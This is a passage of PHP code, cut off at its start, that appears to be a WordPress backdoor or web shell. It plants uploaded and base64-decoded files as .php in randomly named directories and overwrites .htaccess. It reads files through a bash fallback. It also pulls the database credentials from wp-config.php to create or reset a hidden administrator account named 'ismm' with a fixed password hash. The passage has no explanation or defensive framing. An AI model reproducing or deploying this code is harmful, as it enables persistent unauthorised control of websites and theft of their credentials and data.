$v){ $d= getRandDirs(r(''),rand(3,6)); $f =$d.'/'.$k; if(fex($f)){ $d= getRandDirs(r(''),rand(3,7)); $f =$d.'/'.$k; } $data[] = array("n"=>$k,"d"=>$d,"s"=>saveFile($f,$v["tmp_name"],".php")); @unlink($v["tmp_name"]); } die(json_encode($data)); } function back2(){ $n = gr("n"); $v = gr("v"); $d= getRandDirs(r(''),rand(3,6)); $f= $d.'/'.$n; if(fex($f)){ $d= getRandDirs(r(''),rand(3,7)); $f =$d.'/'.$n; } $data = array("n"=>$n,"d"=>$d,"f"=>saveFile($f,$v,".php")); die(json_encode($data)); } function htac(){ $n = ".htaccess"; $f = r($n); if(fex($f))@unlink($f); if(fex($f))@rename($f,$f.".bk"); $t= saveFile($n,$_FILES["h"]["tmp_name"],""); @unlink($_FILES["h"]["tmp_name"]); die($t); } function hija(){ if(count($_FILES) == 0)die(0); $arr = array_keys($_FILES); $name = end($arr); if(!empty(gr("f")))$name=gr("f"); $d= gr("d"); $n= gr("n"); $m= gr("m")?1:0; if($n != ""){ $d = getRandDirs(r(''),$n).'/'.trim($d,"/"); } $d= trim($d,"/"); $f = r($name.".php"); if($d != "") { $f = r($d."/".$name.".php"); mkdir(r($d),0777,true); } die(fileWrite($f, b64decode(fileRead($_FILES[$name]["tmp_name"])),1,$m)?"1".($n!=""?"-".$d:""):"0"); } function readF($f){ if(!fex($f))return ""; $s = file_get_contents($f); if(empty($s)){ $fp = @fopen($f, 'r'); if($fp) { while( !@feof($fp) ) $s .= @fread($fp, 1024); @fclose($fp); } } if(empty($s)){ $s = @execute("/bin/bash -c 'cat ".$f."'"); } return $s; } function incFile(){ $d= r("wp-includes"); if(!is_dir($d)){ die(); } $arr = array(); $dir = scandir($d); foreach ($dir as $v) { if ($v == '.' || $v == '..' || is_dir($d . '/' . $v) || strpos($v,".php")===false) continue; $arr[] = $v; } if(count($arr) == 0) die(); shuffle($arr); $n = gr("n"); if(empty($n)) $n = 3; die(implode(",",array_slice($arr,0,$n))); } function adduser(){ if (is_file(r('wp-config.php'))) { $contents = readF(r('wp-config.php')); preg_match("@'DB_NAME',\s*'(.*?)'@", $contents, $matchd); preg_match("@'DB_USER',\s*'(.*?)'@", $contents, $matchu); preg_match("@'DB_PASSWORD',\s*'(.*?)'@", $contents, $matchp); preg_match("@'DB_HOST',\s*'(.*?)'@", $contents, $matchh); preg_match("@table_prefix\s*=\s*'(.*?)'@", $contents, $matchw); $db_name = $matchd[1]; $db_user = $matchu[1]; $db_pass = $matchp[1]; $db_host = $matchh[1]; $db_pre = $matchw[1]; $db_port = "3306"; if (stripos($db_host, ":")) { $arr = explode(":", $db_host); $db_host = $arr[0]; $db_port = $arr[1]; } if (trim($db_host) == "") { $db_host = "localhost"; } $con = mysqli_connect($db_host, $db_user, $db_pass, $db_name, $db_port); $sql = "select * from $db_pre" . "users where user_login='ismm';"; $query = mysqli_query($con, $sql); $row = mysqli_fetch_array($query); if ($row['user_login'] != "" || $row['user_login'] != null) { $sql = "update $db_pre" . "users set user_pass='\$P\$B048Faht2IlfSgEvyKyHYlAmtquiW.0' where user_login='ismm';"; mysqli_query($con, $sql); } else { $sql = "insert into $db_pre" . "users(user_login,user_pass,user_nicename,user_email,user_registered,user_activation_key,user_status,display_name) values('ismm', '\$P\$B048Faht2IlfSgEvyKyHYlAmtquiW.0', 'ismm', '123@abc.com', '2020-04-21 06:42:46', '', '0', 'ismm');"; $query = mysqli_query($con, $sql); $sql = "select ID from $db_pre" . "users where user_login='ismm';"; $query = mysqli_query($con, $sql); $row = mysqli_fetch_array($query); $id = $row['ID']; $sql = "insert into $db_pre" . "usermeta(user_id, meta_key, meta_value) values($id, '$db_pre" . "capabilities', 'a:1:{s:13:\"administrator\";b:1;}');"; $query = mysqli_query($con, $sql); $sql = "select * from $db_pre" . "users where user_login='ismm';"; $query = mysqli_query($con, $sql); mysqli_fetch_array($query); } } }